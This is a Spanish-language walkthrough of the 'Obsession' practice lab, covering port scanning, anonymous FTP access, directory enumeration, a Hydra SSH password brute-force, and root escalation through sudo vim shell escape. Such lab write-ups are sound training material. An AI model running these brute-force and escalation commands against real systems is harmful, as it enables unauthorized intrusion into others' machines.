# Obsession

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fvy6a11fwkHZl5xb3rvMB%2Fimage.png?alt=media&#x26;token=31813e7a-a742-4d34-be97-5b693b5f03e9" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open -sT --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVoNEcGyMh2MXbmxQWInA%2F1.png?alt=media)

Como podemos observar durante el escaneo que el **puerto 21** perteneciente al **servicio FTP**, el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p21,22,80 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Ffl9fmcCpd1JpRJKZjGo4%2F2.png?alt=media" alt=""><figcaption></figcaption></figure>

Observamos que el puerto **21** tiene dos archivos que podrían contener información relevante, y que la conexión es permitida con el usuario **anonymous** y sin contraseña, por lo que nos conectaremos a través de **FTP**. Esto lo sabemos ya que la versión es vulnerable a esas credenciales.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPhgKv51S3IJq5YK7WK2M%2F3.png?alt=media)

Tras entrar, debemos listar y descargar los archivos que se mostraban anteriormente a través de los comandos:

```bash
ls
get chat-gonza.txt
get pendientes.txt
```

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FZ9sUgDTQY0UN5ty261F9%2F4.png?alt=media)

Ahora mostramos el contenido de esos archivos con:

```bash
cat chat-gonza.txt
cat pendientes.txt
```

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FG2QmZoNME2sSpjRXtJHI%2F5.png?alt=media)

Con esto, descubrimos información de algunos de los usuarios e información de los permisos, lo que nos proporciona datos relevantes.

Seguimos indagando más sobre los puertos y ahora investigamos el servicio **HTTP**. Se ingresó la dirección IP en el navegador, lo que llevó a que la página web nos muestre un blog de entrenamiento personal.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fipnd2fns21lkETdDOJP2%2F6.png?alt=media)

Ahora buscaremos directorios con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1VBj2mraRcW3uHr4nXTm%2F7.png?alt=media" alt=""><figcaption></figcaption></figure>

Descubrimos dos directorios que son `/backup/` y `/important/`, por lo que los revisamos y su contenido a continuación.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FiIAN3tMZWDMVMejuhtV6%2F8.png?alt=media)

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqRLCusQ7XvkKNKoxjpfS%2F9.png?alt=media)

Con esto, descubrimos que el usuario es **russoski**. Continuamos con el siguiente directorio.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrBn16hoWQmfiBnQBzOnl%2F10.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7woSSQFAJJxAvRDZgQn6%2F11.png?alt=media" alt=""><figcaption></figcaption></figure>

Parece ser que esto último no tiene nada relevante, por lo que nos centramos en lo que hemos descubierto anteriormente, que es el usuario.

### 🚀 **EXPLOTACIÓN**

Con la información obtenida anteriormente, realizamos el comando:

```bash
hydra -l russoski -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 5
```

que utiliza la herramienta **Hydra** para realizar un ataque de fuerza bruta contra el servicio **SSH** de una máquina con la IP **172.17.0.2**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fo8hKm23XFrhsGRoTXdES%2F12.png?alt=media" alt=""><figcaption></figcaption></figure>

Al realizar el ataque de fuerza bruta, hemos descubierto la contraseña de **russoski**. Sabiendo esto, nos conectamos a través de **SSH** al usuario con el comando:

```bash
ssh russoski@172.17.0.2
```

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCgTxy1IGovulMx1auSab%2F13.png?alt=media)

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fyxv0K7xLSaKx5RD9OHce%2F14.png?alt=media)

Observamos que podemos escalar privilegios con **vim** usando el comando:

```bash
sudo vim -c ':!/bin/sh'
```

Tras eso, ponemos:

```bash
id
```

y ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Flthy6H91ZmZwRNVZvUvr%2Fimage.png?alt=media&#x26;token=d8e4e014-bdb2-44eb-9f6a-b27e5f7dc8fb" alt=""><figcaption></figcaption></figure>
